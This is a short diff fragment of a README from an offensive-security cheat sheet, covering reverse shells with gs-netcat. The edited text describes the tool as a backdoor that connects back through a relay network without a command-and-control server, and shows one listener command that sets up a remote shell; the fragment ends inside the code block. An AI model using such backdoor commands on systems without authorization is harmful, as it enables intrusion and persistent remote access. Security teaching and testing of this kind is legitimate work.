hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="rswg-anchor"></a>
 **5.i.a.
 Reverse shell with gs-netcat**

 Install [gs-netcat](https://github.com/hackerschoice/gsocket).
-It spawns a fully functional PTY reverse shell without the need of a Command & Controll server.
-If netcat is the equivalent to a swiss army knife than gs-netcat is a german battle axe.
+It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network.
+This means you do not need to run your own Command & Control server for the backdoor to connect back to.
+If netcat is the equivalent to a swiss army knife than gs-netcat is a german battle axe :>

 ```
 $ ./gs-netcat -s MySecret -l -i    # Host